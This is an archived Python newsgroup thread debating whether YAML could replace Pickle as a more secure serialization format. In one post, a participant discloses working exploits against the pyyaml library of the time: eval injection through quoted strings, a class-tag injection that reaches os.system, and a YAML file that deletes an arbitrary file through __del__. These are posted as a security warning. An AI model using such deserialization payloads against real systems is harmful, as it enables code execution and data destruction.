PyYaml?

Chris S.

Is there any benefit to Pickle over YAML? Given that Pickle is insecure,
wouldn't it make more sense to support a secure serialization format,
one that's even readable to boot, such as YAML? There's even a pure
Python implementation at www.pyyaml.org
 
Andrew Dalke

Chris said:
Is there any benefit to Pickle over YAML? Given that Pickle is insecure,
wouldn't it make more sense to support a secure serialization format,
one that's even readable to boot, such as YAML? There's even a pure
Python implementation at www.pyyaml.org

Looking at the PyYaml docs, under "limitations"


] PyYaml converts Python builtin types bidirectionally, and converts
] instances unidirectionally (although with directives eg from_yaml
] and to_yaml it can do this bidirectionally). When YAMLizing an
] instance, PyYaml serializes only its instance data (its '__dict__'),
] with no meta-information about which class it came from.

Add support for restoring an arbitrary class and you end
up with exactly the same security problems pickle has.

Also, I'll guess that it doesn't handle Python's new __slots__
since it only mentions __dict__.
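To make the `__slots__` concern concrete, here is a minimal Python 3 sketch. The `Point` class and the `instance_state` helper are hypothetical names invented for illustration and are not part of PyYaml. It shows that a slotted instance has no `__dict__` for a dict-only dumper to read, and one way a dumper could gather the state anyway.

```python
def instance_state(obj):
    """Collect attributes from __dict__ (if present) and from every
    __slots__ declaration found along the class hierarchy."""
    state = dict(getattr(obj, "__dict__", {}))
    for cls in type(obj).__mro__:
        slots = getattr(cls, "__slots__", ())
        if isinstance(slots, str):       # a single slot may be given as a string
            slots = (slots,)
        for name in slots:
            if name in ("__dict__", "__weakref__"):
                continue
            if hasattr(obj, name):       # unset slots raise AttributeError
                state[name] = getattr(obj, name)
    return state


class Point:
    """Hypothetical class that keeps its attributes in slots."""
    __slots__ = ("x", "y")

    def __init__(self, x, y):
        self.x = x
        self.y = y


p = Point(1, 2)
print(hasattr(p, "__dict__"))   # a dict-only serializer finds nothing here
print(instance_state(p))
```

The helper ignores name mangling of private slots, so it is a sketch of the idea rather than a complete solution.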


Andrew
 
Jeremy Bowers

Is there any benefit to Pickle over YAML? Given that Pickle is insecure,
wouldn't it make more sense to support a secure serialization format,
one that's even readable to boot, such as YAML?

Anything that can "pickle" will be insecure. It is the capabilities of
pickling, not the implementation, that is insecure.
 
Chris S.

Andrew said:
Looking at the PyYaml docs, under "limitations"


] PyYaml converts Python builtin types bidirectionally, and converts
] instances unidirectionally (although with directives eg from_yaml
] and to_yaml it can do this bidirectionally). When YAMLizing an
] instance, PyYaml serializes only its instance data (its '__dict__'),
] with no meta-information about which class it came from.

Add support for restoring an arbitrary class and you end
up with exactly the same security problems pickle has.

I believe those docs are slightly outdated. PyYaml does have limited
support for class restoration (at least in my experience). Granted, the
class definition must be loaded into the current frame, a similar
limitation to Pickle's. However, Pickle's small programming language
allows for arbitrary file deletion. That would not be possible with Yaml.

Also, I'll guess that it doesn't handle Python's new __slots__
since it only mentions __dict__.

True. In fact, the current implementation doesn't yet fully handle
subclassing/inheritance. They've done a lot, but it's still a work in
progress.
 
Chris S.

Jeremy said:
Anything that can "pickle" will be insecure. It is the capabilities of
pickling, not the implementation, that is insecure.

I disagree. Pickle's mini programming language allows for arbitrary file
deletion. There's nothing in the concept of serialization that requires
this ability.
 
Paul Rubin

Chris S. said:
Is there any benefit to Pickle over YAML? Given that Pickle is
insecure, wouldn't it make more sense to support a secure
serialization format, one that's even readable to boot, such as YAML?
There's even a pure Python implementation at www.pyyaml.org

Bleccch!
 
Andrew Dalke

Chris said:
However, Pickle's small programming language
allows for arbitrary file deletion. That would not be possible with Yaml.

I just looked through pickle.py's list of opcodes. I don't
see any which mention file deletion.

There are ones that let you call an arbitrary callable
with arbitrary parameters, like 'os.unlink' with your filename
of choice. But even if you limited that to arbitrary constructors,
instead of all arbitrary callables, you can still delete files.
Consider tempfile._TemporaryFileWrapper. Except under MS Windows,
if you make one of these its __del__ deletes the named files.
You can pass any name you want as the filename, so it provides
a way to delete files via pickle.
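The "call an arbitrary callable with arbitrary parameters" mechanism can be sketched in Python 3 as follows. `Payload` is a hypothetical class, and a harmless callable (`sorted`) stands in for something like `os.unlink`. The point is only that the call happens during loading and that the loaded value is whatever the callable returns.

```python
import pickle


class Payload:
    """Hypothetical attacker-controlled object."""

    def __reduce__(self):
        # pickle records "call this callable with these arguments".
        # sorted() is harmless; os.unlink would be stored the same way.
        return (sorted, ([3, 1, 2],))


data = pickle.dumps(Payload())
result = pickle.loads(data)   # sorted([3, 1, 2]) runs while loading
print(result)
```

Note that the class `Payload` itself never needs to exist on the loading side; only the named callable does.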

If Yaml lets me create
tempfile._TemporaryFileWrapper(None, "/path/to/file")
then that file will (eventually) be deleted.

If Yaml doesn't let me create that file then either 1) it
isn't as powerful as pickle or 2) it uses some registry
of allowed objects. If #2, I think pickle supports that too.
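A registry of allowed objects can be sketched with the modern standard library by overriding `pickle.Unpickler.find_class`. This is Python 3 code, so it is not what was available when this thread was written. The allow-list contents and the names `RestrictedUnpickler`, `restricted_loads`, and `Payload` are illustrative assumptions.

```python
import io
import os
import pickle
from collections import OrderedDict

# Hypothetical allow-list of (module, name) pairs that may be loaded.
ALLOWED = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Every global named in the pickle stream is resolved through here.
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("%s.%s is not allowed" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Payload:
    """Hypothetical hostile object: asks the loader to call os.getcwd()."""

    def __reduce__(self):
        return (os.getcwd, ())


ok = restricted_loads(pickle.dumps(OrderedDict(a=1)))

try:
    restricted_loads(pickle.dumps(Payload()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(ok, blocked)
```

An allow-list only helps if every class on it is itself safe to construct, which is exactly the `__del__` problem described above.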

True. In fact, the current implementation doesn't yet fully handle
subclassing/inheritance. They've done a lot, but it's still a work in
progress.

Then why would it be a viable replacement for pickle?

Andrew
 
Jeremy Bowers

I disagree. Pickle's mini programming language allows for arbitrary file
deletion. There's nothing in the concept of serialization that requires
this ability.

Point. But it is also insecure because instantiating objects can cause
arbitrary code to execute. This is fundamental to any Pickle in Python.
Given that, one might as well shoot for speed, ease of implementation, and
concise representations (power of implementation) without worrying about
security.

In other words, I expect that the ability to delete files is an effect
(second-order) of the fundamental insecurity, and not a cause, in the
sense that removing that particular issue does not get you significantly
closer to security.
 
Wilk

Chris S. said:
Is there any benefit to Pickle over YAML? Given that Pickle is
insecure, wouldn't it make more sense to support a secure
serialization format, one that's even readable to boot, such as YAML?
There's even a pure Python implementation at www.pyyaml.org

There are other advantages to using yaml instead of pickle anyway
(portability, readability...)
Syck is even faster than pickle, I think.
http://whytheluckystiff.net/syck/

But all these projects seem to be asleep...
 
Chris S.

Wilk said:
There are other advantages to using yaml instead of pickle anyway
(portability, readability...)
Syck is even faster than pickle, I think.
http://whytheluckystiff.net/syck/

I agree completely, although I've been surprised by the general lack of
interest around here. You'd think a more secure, portable, and readable
serialization format would be welcomed with open arms, yet most of the
comments I've read past and present have been almost hostile.

But all these projects seem to be asleep...

Can you blame them for the lack of interest? No good idea goes
unpunished... Ironically, YAML borrows key ideas from several languages,
including Python.
 
Paul Moore

Chris S. said:
I agree completely, although I've been surprised by the general lack of
interest around here. You'd think a more secure, portable, and readable
serialization format would be welcomed with open arms, yet most of the
comments I've read past and present have been almost hostile.

"Hostile" seems a little exaggerated. The original posting (quoted
above) asked the question "Is there any benefit to Pickle over YAML?"
I suppose that a reasonable answer (from me) might be "not that I
know of", but that begs the question, as I know very little of YAML.

Maybe the original poster (or some other supporter of YAML) could
provide some reasons to think that YAML *might* be superior to
Pickle. Then the people who know about Pickle could respond more
helpfully.

For example, you (Chris S) claim that YAML is "more secure, portable,
and readable". OK, let's take these in turn:

More secure - as others have pointed out, Pickle allows pickling and
unpickling of class instances, and class code can do what it likes in
the constructor (I oversimplify here, as I don't know the details well
myself). Sure, this is a security issue, but it's an inherent
insecurity in the feature, and not limited to Pickle. If YAML
implemented the same feature, it would have the same issues to
resolve. Improving security by removing features isn't a clear win for
YAML (note that I am not saying that security in exchange for reduced
features might not be a good tradeoff in some cases - I'm addressing
the "replace Pickle with YAML" suggestion, not a suggestion that we
have both).

More portable - hmm, OK. I'm not sure where you want portability
*between*, though. Pickle is, as far as I know, portable across
platforms. Are you talking about portability between languages? I
can't think where I'd want to dump a Python object for loading into
Perl or Ruby, though. Can you offer me some real-life use cases?

More readable - I'll give you this. And yes, it can be useful. I've
been stuffed before now with Java programs whose configuration is
stored as a serialised-to-disk object which is completely opaque to
external tools, let alone human readers. But this is a property that
is useful only in case of failure (if the config gets stuffed, I can
hand-hack the dump file, or if I forget what I set parameter X to, I
can look in the dump). If the application design *requires* the dump
format to be readable, we've moved away from serialisation, and
started to talk about configuration formats (which is a separate
issue, one in which it is quite possible that YAML is strong, but
*not* one in which it is competing with Pickle).

Can you blame them for the lack of interest? No good idea goes
unpunished... Ironically, YAML borrows key ideas from several
languages, including Python.

I have certainly looked at YAML. I have to say that I wasn't really
sure what it *was* though. It seems to claim to be different things
at different times - a serialisation format, a config file format, a
replacement for XML, ... At the time, I was looking for a config
format, and it wasn't *quite* what I wanted, because some of the
serialisation and XML aspects made it slightly clumsy as a config
format. I suspect that people who want to use YAML for serialisation,
or as an XML replacement, may feel the same way. And yet, I don't get
the feeling that YAML is being developed as a "compromise" format, so
I am obviously missing a key design principle.

As regards the existing YAML libraries for Python, when I looked I
found that the PyYAML website claimed that it was out of date with
respect to the latest spec. I also tried SYCK, which looks OK, but
which I did manage to provoke a crash from without trying too hard.
Also, there were a number of features (not that I know how important
they are) marked with "Available in Ruby" (and hence not Python, I
assume, given that other features mention Python explicitly).

None of this is a criticism of YAML and/or its libraries themselves.
However, it does make any suggestion that YAML be used to replace a
key part of the Python standard library seem a little premature, at
least.

I hope this response didn't come across as hostile - I certainly
don't intend it that way. But I do believe that it is the
responsibility of those making the suggestion that YAML replace
pickle to come up with decent arguments. (Or a robust, tested,
documented patch for the Python core, of course - that avoids the
impression that the requester is hoping that someone else will do the
work for him :))

I'd like to see a strong (this includes "well-documented"!! :)) YAML
library for Python, if only so I could try it out and find out what
YAML *is* good for, in my environment. In theory, I like YAML - it's
just the practicalities that elude me.

[Later]
I just re-read some of the YAML website. It appears clear from there
that YAML is designed as a serialisation format. But there seems to
be a lack of justification as to *why* the design goals (section 1.1
of the spec) are important. Also, security is *not* an explicit goal,
and section 3.1.6 (the "Construct" process) is completely lacking in
any discussion of the security or other implications of converting a
YAML file to a native language object. This seems somewhat surprising
in a specification for a serialisation format...

Paul.
 
Andrew Dalke

Chris said:
I agree completely, although I've been surprised by the general lack of
interest around here. You'd think a more secure, portable, and readable
serialization format would be welcomed with open arms, yet most of the
comments I've read past and present have been almost hostile.

YAML and pickles address two different but related domains.
Pickle attempts to serialize and deserialize arbitrary
Python data structures. YAML serializes a subset of the
data structures that can be made portable, with it seems
some hooks for new datatypes.

Here's a test. Can you do the following in YAML and do
so securely? (Untested code.)

import os

class DeleteFile:
    def __init__(self, filename, yes_really = False):
        self.filename = filename
        self.yes_really = yes_really
    def __eq__(self, other):
        return (self.filename == other.filename and
                self.yes_really == other.yes_really)
    def __del__(self, remove = os.remove):
        if self.yes_really:
            try:
                remove(self.filename)
            except OSError:  # os.remove raises OSError, not IOError
                pass

# this works for pickle. Does it work for YAML?
x = DeleteFile("/path/to/important/file")
... store 'x' to YAML file ...
y = ... read from YAML file
assert x == y

# This is insecure in pickle. Would YAML be secure?
z = ... read arbitrary YAML file which may have a
        DeleteFile where 'yes_really' is True ...
del z

Or what about support for multiple inheritance?

import datetime

class Base1:
    def __init__(self, a, b):
        self.a = a
        self.b = b
    def speak(self):
        print "The", self.a, "says", self.b

class Base2:
    def __init__(self, x):
        self.x = x
    def spell(self):
        print self.x, "is spelled", "-".join(list(self.x))

class Child(Base1, Base2):
    def __init__(self, a, b):
        Base1.__init__(self, a, b)
        Base2.__init__(self, a)
        self.z = datetime.datetime.now()


kid = Child("goat", "baaaaa")
... save 'kid' to YAML ...
animal = ... read that YAML file ...
animal.speak()
animal.spell()

In either case, how in the world is it portable?

Andrew
 
Chris S.

Paul said:
"Hostile" seems a little exaggerated. The original posting (quoted
above) asked the question "Is there any benefit to Pickle over YAML?"
I suppose that a reasonable answer (from me) might be "not that I
know of", but that begs the question, as I know very little of YAML.

Maybe the original poster (or some other supporter of YAML) could
provide some reasons to think that YAML *might* be superior to
Pickle. Then the people who know about Pickle could respond more
helpfully.

For example, you (Chris S) claim that YAML is "more secure, portable,
and readable". OK, let's take these in turn:

More secure - as others have pointed out, Pickle allows pickling and
unpickling of class instances, and class code can do what it likes in
the constructor (I oversimplify here, as I don't know the details well
myself). Sure, this is a security issue, but it's an inherent
insecurity in the feature, and not limited to Pickle. If YAML
implemented the same feature, it would have the same issues to
resolve. Improving security by removing features isn't a clear win for
YAML (note that I am not saying that security in exchange for reduced
features might not be a good tradeoff in some cases - I'm addressing
the "replace Pickle with YAML" suggestion, not a suggestion that we
have both).

I don't quite follow your logic. If you load a serialized file, you
should conceivably already know what classes it should and should not be
instantiating, and be able to restrict its access accordingly. Of
course, a file could still be altered to wreak havoc within the confines
of the set limitations, but I'm under the impression that Pickle allows
execution of arbitrary code, regardless of the classes being
instantiated. Please correct me if I'm wrong.

More portable - hmm, OK. I'm not sure where you want portability
*between*, though. Pickle is, as far as I know, portable across
platforms. Are you talking about portability between languages? I
can't think where I'd want to dump a Python object for loading into
Perl or Ruby, though. Can you offer me some real-life use cases?

I meant language and platform portability. I suppose you'd find this
aspect attractive for the same reasons you'd use XML, which some have
also used as a serialization format. Granted, not every language's
objects may be translatable, but many languages share common data
primitives.

More readable - I'll give you this. And yes, it can be useful. I've
been stuffed before now with Java programs whose configuration is
stored as a serialised-to-disk object which is completely opaque to
external tools, let alone human readers. But this is a property that
is useful only in case of failure (if the config gets stuffed, I can
hand-hack the dump file, or if I forget what I set parameter X to, I
can look in the dump). If the application design *requires* the dump
format to be readable, we've moved away from serialisation, and
started to talk about configuration formats (which is a separate
issue, one in which it is quite possible that YAML is strong, but
*not* one in which it is competing with Pickle).
[snip]

None of this is a criticism of YAML and/or its libraries themselves.
However, it does make any suggestion that YAML be used to replace a
key part of the Python standard library seem a little premature, at
least.

I hope this response didn't come across as hostile - I certainly
don't intend it that way. But I do believe that it is the
responsibility of those making the suggestion that YAML replace
pickle to come up with decent arguments. (Or a robust, tested,
documented patch for the Python core, of course - that avoids the
impression that the requester is hoping that someone else will do the
work for him :))

Fair enough. I didn't mean to imply that the current YAML
implementations were drop-in replacements for Pickle, only that the
concept of YAML deserves more attention.

I'd like to see a strong (this includes "well-documented"!! :)) YAML
library for Python, if only so I could try it out and find out what
YAML *is* good for, in my environment. In theory, I like YAML - it's
just the practicalities that elude me.

[Later]
I just re-read some of the YAML website. It appears clear from there
that YAML is designed as a serialisation format. But there seems to
be a lack of justification as to *why* the design goals (section 1.1
of the spec) are important. Also, security is *not* an explicit goal,
and section 3.1.6 (the "Construct" process) is completely lacking in
any discussion of the security or other implications of converting a
YAML file to a native language object. This seems somewhat surprising
in a specification for a serialisation format...

Well, if the concept of serialization is indeed inherently insecure,
what could they possibly do? In order for YAML to directly address
security, it would have to concern itself with the "meaning" of the data
being serialized, which seems outside the scope of YAML's purpose.
Serialization security seems generally assigned as a responsibility of
the user, who is usually in the best position to gauge their data's
effects. The best a serialization format can do is ensure data
reconstruction within the bounds described by the user.
 
Chris S.

Andrew said:
YAML and pickles address two different but related domains.
Pickle attempts to serialize and deserialize arbitrary
Python data structures. YAML serializes a subset of the
data structures that can be made portable, with it seems
some hooks for new datatypes.

Here's a test. Can you do the following in YAML and do
so securely? (Untested code.)

[snip code]

Conceptually, yes. That code would work fine with a full YAML
implementation. Admittedly, the current pure-Python implementation is
not yet complete. I didn't mean to imply that the current YAML
implementations were drop-in replacements for Pickle, only that the
concept of YAML is deserving of more attention.
 
Jeremy Bowers

I don't quite follow your logic. If you load a serialized file, you should
conceivably already know what classes it should and should not be
instantiating, and be able to restrict its access accordingly.

In theory, yes. In Java, yes, I would imagine. In Python, not so far. In
fact, note that Bastion and RExec have been removed from modern Pythons
because they were false assurances. Securing Pickle is probably the same
problem as re-writing those modules to work in modern Python. People more
familiar with the internals can give more details about that, though I'd
google the Python dev list before asking anyone.

It is probably not theoretically impossible to add this to Python but it
is surprisingly difficult; it is the sort of thing you have to design into
the language from day one and even then it is hard.

I meant language and platform portability. I suppose you'd find this
aspect attractive for the same reasons you'd use XML, which some have also
used as a serialization format. Granted, not every language's objects may
be translatable, but many languages share common data primitives.

You'd be surprised, if you actually tried. (This is technically off-topic,
not directly about Pickle.)

A data type is basically a range of values, and a set of operations on it
that returns some value.

So, C has this thing called an "int", right? Surely Python has it too.

But, technically, it doesn't. Compare (this is "test.cpp"):

#include <iostream>

int main() {
    int a = 1073741824;
    std::cout << a * 4 << std::endl;
    return 0;
}

with the same multiplication in Python, which gives:

4294967296



Python and C do *not* have the same int "datatype". This matters when you
go to serialize 2 ^ 43 and the resulting number works in Python but has
some random looking value in C++.

If you really get down to it, languages share far fewer datatypes than
you'd think, and while the ten-mile-high view says "Oh, that shouldn't
matter", I assure you, if you actually got into trying to design an actual
serialization protocol you'd rapidly find it matters.
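The mismatch can be reproduced from the Python side with the standard library. This is a sketch in Python 3. `ctypes.c_int32` is used here as a stand-in for a 32-bit C `int`, which is an assumption about the target platform, and its silent truncation models two's-complement wraparound rather than anything the C standard guarantees for signed overflow.

```python
import ctypes
import struct

big = 1073741824 * 4                  # 2**32, an ordinary Python int
wrapped = ctypes.c_int32(big).value   # what survives in 32 signed bits

try:
    struct.pack("<i", 2 ** 43)        # try to serialize into 4 bytes
    fits = True
except struct.error:
    fits = False                      # the value is out of range for "i"

print(big, wrapped, fits)
```

A serializer has to pick one of these behaviours (truncate, refuse, or switch to a wider representation), and each choice leaks into the format.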
 
Andrew Dalke

[Long post. Summary is I've found three exploits in
pyyaml and at least five limitations w.r.t. the existing
Python pickles. I DO NOT recommend anyone use pyyaml
when the input comes from untrusted code.

REPEAT: pyyaml allows ARBITRARY CODE TO BE EXECUTED.]

Me:
Conceptually, yes. That code would work fine with a full YAML
implementation. Admittedly, the current pure-Python implementation is
not yet complete. I didn't mean to imply that the current YAML
implementations were drop-in replacements for Pickle, only that the
concept of YAML is deserving of more attention.

This original thread started with you asking:
> Is there any benefit to Pickle over YAML?

You have since distinguished between two YAMLs, the conceptual
one and the concrete one.

If it's the latter then the answer we've made several times
is that YAML as currently implemented is not able to replace
pickle. You here agree with us.

Let's suppose YAML-the-concept was implemented. That's
going to call for a lot of work so that the implementation
meets the concept, and well beyond what's been done so far.

For example, a viable pickle replacement will require
a C implementation because performance is important.
The pure Python version "pickle.py" wasn't fast enough, so
someone (Jim Fulton, as I recall) contributed cPickle.

You'll also need a non-recursive implementation. Here's
a test with the pyyaml version I just got from svn using
a very deep data structure. It hits Python's recursion
limit:
...     x = (x,)
...
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "yaml/dump.py", line 18, in dump
    return Dumper().dump(*data)
  File "yaml/dump.py", line 43, in dump
    self.dumpDocuments(data)
  File "yaml/dump.py", line 61, in dumpDocuments
    self.dumpData(obj)
  File "yaml/dump.py", line 90, in dumpData
  .....
    self.dumpList(data)
  File "yaml/dump.py", line 138, in dumpList
    self.indentDump(item)
  File "yaml/dump.py", line 67, in indentDump
    self.dumpData(data)
RuntimeError: maximum recursion depth exceeded

It doesn't handle tuples, only lists

>>> print yaml.load(yaml.dump( (1,2,3) )).next()
[1, 2, 3]
>>>
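The tuple-versus-list loss is typical of formats that have a single sequence type. As a hedged illustration in Python 3, the standard `json` module is used below purely as a stand-in for such a format (it is not pyyaml), next to `pickle`, which records the Python type.

```python
import json
import pickle

value = (1, 2, 3)

via_json = json.loads(json.dumps(value))        # the tuple comes back as a list
via_pickle = pickle.loads(pickle.dumps(value))  # the tuple comes back as a tuple

print(type(via_json).__name__, type(via_pickle).__name__)
```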


I see it doesn't handle Unicode correctly. Here
it doesn't round-trip a Unicode character back to
Unicode.

Digging deeper into the YAML implementation I see
it really doesn't handle Unicode correctly -- there's
even a *MAJOR* security hole. Watch this. I'll
start with a hand-crafted YAML file and read it.

% cat test.yaml
--- "\u000a"+' '.join(__import__('os').listdir('.')) + ""
% python
Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
[GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
u'\n.svn assets docs examples experimental patches README scripts
setup.py test.yaml TESTING yaml'

See how it eval'ed the embedded and arbitrary
Python code in the string it thought was Unicode?
That's because the code in implicit.py doesn't fully
verify the string before eval'ing it, in

if val[0] == '"' and val[-1] == '"':
    if re.search(r"\u", val):
        val = "u" + val
    unescapedStr = eval (val)
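One way to unescape a quoted scalar without running code is `ast.literal_eval`, which accepts literals only. This is a Python 3 sketch of that idea, not a patch for implicit.py. `parse_quoted` is a hypothetical helper name, and the hostile input is the line from test.yaml above.

```python
import ast


def parse_quoted(val):
    """Unescape a double-quoted scalar, accepting string literals only."""
    if len(val) >= 2 and val[0] == '"' and val[-1] == '"':
        try:
            result = ast.literal_eval(val)   # no calls, names, or operators on strings
        except (ValueError, SyntaxError):
            raise ValueError("not a plain quoted string") from None
        if isinstance(result, str):
            return result
    raise ValueError("not a plain quoted string")


safe = parse_quoted(r'"line\u000abreak"')

hostile = r'''"\u000a"+' '.join(__import__('os').listdir('.')) + ""'''
try:
    parse_quoted(hostile)
    rejected = False
except ValueError:
    rejected = True

print(repr(safe), rejected)
```

Checking only the first and last characters, as the original code does, cannot tell a single string literal from an expression that merely starts and ends with a quote.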


This code is also suspect, from klass.py

def makeClass(module, classname, dict):
    exec('import %s' % (module))
    klass = eval('%s.%s' % (module, classname))
    obj = new.instance(klass)
    if hasMethod(obj, 'from_yaml'):
        return obj.from_yaml(dict)
    obj.__dict__ = dict
    return obj
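A class lookup that avoids `exec` and `eval` could look roughly like the following Python 3 sketch. The function name `resolve_class`, the allow-list, and its single entry are hypothetical. The tag is first checked to be a plain dotted identifier, then checked against the allow-list, and only then imported.

```python
import importlib
import re

# Hypothetical allow-list of (module, classname) pairs the loader may build.
ALLOWED_CLASSES = {("fractions", "Fraction")}

_MODULE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*\Z")
_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")


def resolve_class(module, classname):
    # Refuse anything that is not a plain identifier before touching it.
    if not (_MODULE.match(module) and _NAME.match(classname)):
        raise ValueError("malformed type tag")
    if (module, classname) not in ALLOWED_CLASSES:
        raise ValueError("class not allowed: %s.%s" % (module, classname))
    mod = importlib.import_module(module)   # imports by name, runs no tag text
    return getattr(mod, classname)


cls = resolve_class("fractions", "Fraction")
print(cls(1, 2))
```

With this shape, a tag such as `os;os.system(...)` fails the identifier check, and `platform._popen` fails the allow-list check.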


Yep, here's an exploit against it. The chr(32) is needed because
there's some sort of split on space upstream so I can't embed
spaces directly. But I can construct them so this shows that
I can pass arbitrary commands to the shell. (Note: the s= ...
assignment is all on one line.)
total 326905
drwxrwxr-x 51 root admin 1734 12 Sep 19:16 Applications
drwxrwxr-x 21 root admin 714 21 Jun 2003 Applications (Mac OS 9)
lrwxr-xr-x 1 root admin 15 17 Feb 2003 Desktop (Mac OS 9)
rebuild
... many lines deleted ...
drwxr-xr-x 12 root wheel 408 12 Sep 2003 usr
lrwxr-xr-x 1 root admin 11 14 Feb 2004 var -> private/var
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "yaml/load.py", line 83, in next
    return self.parse_value(indicator)
  File "yaml/load.py", line 168, in parse_value
    value = self.parse_unaliased_value(value)
  File "yaml/load.py", line 179, in parse_unaliased_value
    return self.typeResolver.resolveType(value, url)
  File "yaml/klass.py", line 12, in resolveType
    return makeClass(moduleName, className, data)
  File "yaml/klass.py", line 16, in makeClass
    klass = eval('%s.%s' % (module, classname))
  File "<string>", line 1
    os;os.system("ls"+chr(32)+"-l"+chr(32)+"/");1.2
      ^
SyntaxError: invalid syntax

Note that I was able to generate the os.system call
before the SyntaxError.

Here's another exploit. It's a variation of the "delete
an arbitrary file" example I posted that you replied could
be made secure "conceptually". It works because the
platform._popen class deletes the temporary file on __del__.

[Andrew-Dalkes-Computer:~/cvses/pyyaml/trunk] dalke% cat rmfile.yaml
--- !!platform._popen
bufsize: ~
mode: r
pipe: ~
tmpfile: delete_this_file.txt

% ls -l delete_this_file.txt
-rw-r--r-- 1 dalke staff 28 19 Sep 23:00 delete_this_file.txt
% python
Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
[GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
% ls -l delete_this_file.txt
ls: delete_this_file.txt: No such file or directory
%



Oh, and I already mentioned that you need support
for __slots__. It also looks like pyyaml doesn't support
classes derived from builtins, as in

>>> class MyList(list):
...     def blah(self): print "blah blah"
...
>>> x=MyList([1,3,5])
>>> x
[1, 3, 5]
>>> x.blah()
blah blah
>>> print yaml.dump(x)
--- [1, 3, 5]
>>> yaml.load(yaml.dump(x)).next()
[1, 3, 5]
>>> yaml.load(yaml.dump(x)).next().blah()
Traceback (most recent call last):

Because YAML the implementation is so far from YAML
the concept, and YAML the implementation is at least
as insecure as pickle, why should we look at YAML
any further?

In fact, I wouldn't even use pyyaml now for any of
my projects knowing just how insecure it is.

> Given that Pickle is insecure, wouldn't it make
> more sense to support a secure serialization format,
> one that's even readable to boot, such as YAML?

Again, please tell me how you can have a "secure
serialization format" which prevents my "__del__
calls os.unlink on arbitrary filename" attack. You've
said it's possible in the abstract. The only way
I know is to register the classes that are safe
to deserialize. But pickles already allow that.

So how would YAML-the-conceptual be any more
secure than pickles as they've existed for years?

And how long would it be until YAML-the-implementation
hopes to be comparable to pickles for both speed
and security?

For that matter, why doesn't pyyaml use the existing
protocol in Python to ask an instance for how to
serialize itself? Why does it need to define a new one?
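For reference, the existing protocol can be driven by any serializer, not just pickle. This is a minimal Python 3 sketch in which `Session`, `dump_state`, and `load_state` are hypothetical names. `__reduce_ex__`, `__getstate__`, and `__setstate__` are the standard hooks that pickle and copy already use.

```python
class Session:
    """Hypothetical class with one field that should not be serialized."""

    def __init__(self, user):
        self.user = user
        self.cache = {}              # transient, rebuilt on load

    def __getstate__(self):
        # Asked by the serializer: "what is your state?"
        return {"user": self.user}

    def __setstate__(self, state):
        # Called on a freshly created instance; __init__ has not run.
        self.user = state["user"]
        self.cache = {}


def dump_state(obj):
    """Ask the instance how to rebuild it: a callable, its args, and the state."""
    rebuild, args, state = obj.__reduce_ex__(2)[:3]
    return rebuild, args, state


def load_state(rebuild, args, state):
    obj = rebuild(*args)             # creates the instance without __init__
    obj.__setstate__(state)
    return obj


original = Session("alice")
original.cache["k"] = "v"
restored = load_state(*dump_state(original))
print(restored.user, restored.cache)
```

A text format would still need its own encoding for the callable and class in the first two elements, but the question of what state an instance exposes is already answered by the class itself.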

Finally, you said
> the concept of YAML is deserving of more attention.

What is the concept? Why is it more deserving
than, say, XML-RPC encoding, or SOAP's, or CORBA's
serialization, or David Mertz' xml_pickle, or
Twisted's jelly, or any of a dozen other
serializations?

- it's not as fast, nor as small as a binary pickle
done with cPickle
- it doesn't understand tuples vs. lists
- it doesn't have the buzz of XML (and XML
advocates also claim readability)
- it doesn't have jelly's upversioning support (when
I looked at it, Twisted allowed classes to
describe how to upgrade older pickles to conform
with changes in the class)
- it doesn't have the validation tools that CORBA
has to ensure that received data fields are at
least the correct types

Some are limitations of the implementation, but the
bar is pretty high so it's up to the advocates (and
of the years YAML's been about you're the first I've
seen) to prove it's deserving.

Andrew
 
Clark C. Evans

Andrew,

Thank you for taking some serious time looking at PyYaml, I'm not
surprised you have found problems; the entire code base was written
in a very short amount of time and numerous short-cuts were taken.
Tim Parkin has decided on a complete rewrite of PyYaml and that's
great news. For now, you may want to consider using syck, but even
then, you can probably find exploits if you dig hard enough. Patches
are, of course, warmly received.

Primary comments on this thread:

- YAML was intended from the first day to be a cross-language
serialization tool. In a mixed-language environment (we use
Ruby, Python and on occasion Perl) YAML is very nice to use.

- Unlike XML, YAML has an information model which closely matches
the needs of programming languages. I can't express how
important this is. We have spent a great deal of time on the
model; YAML isn't simply a data format. We are working on
transformation languages, and other generic tools.

- YAML was created for human reading / authoring. We have spent
an enormous amount of time working with real use cases of data
to find a very clean expression of structured data. If you
like Python's use of whitespace to show structure, you will
probably like YAML. While automated generation of YAML isn't
that pretty, it eventually will be.

- This is a long term project; YAML is designed with the idea that
data lives far longer than programs. We are taking our time. We
have also strived for 'consensus' when possible. This may seem
to slow down specification and implementation work; however, we
are better for it. There are lots of people who have provided
critical insights for YAML and it's been a delightful community.

- Implementing YAML isn't easy. At every step of the way the
consensus has been to keep a clean information model and have
lots of human presentation options. The only time we favored an
implementation issue over presentation is when it would prevent
YAML from being used in a streaming application. Therefore we
have stuck with very minimal look-ahead requirements. That
said, if you are looking for an LR(1) grammar for ANTLR or Bison,
I don't think one exists; but, alas I'll be gladly proven wrong.

- YAML isn't an efficient binary format. Pickle or something like
Jelly's s-expressions will be far faster to parse and load.

- Finally, everyone working on YAML has a full-time job; we do not
have grant funding or university backing. Therefore, implementations
will take time to mature; especially considering the complexity
of the tradeoffs.

I hope this is helpful to you.

Clark
 
Clark C. Evans

On Sun, Sep 19, 2004 at 02:53:22PM +0100, Paul Moore wrote:
| It seems to claim to be different things at different times - a
| serialization format, a config file format, a replacement for XML

At conception, I wanted a text format for invoices and other
transactional business documents that was: (a) very human readable,
(b) loaded into native data structures without requiring a DOM or a
bunch of parser-hand-holding, (c) had a simple enough information
model that a schema and transformation language would not be a
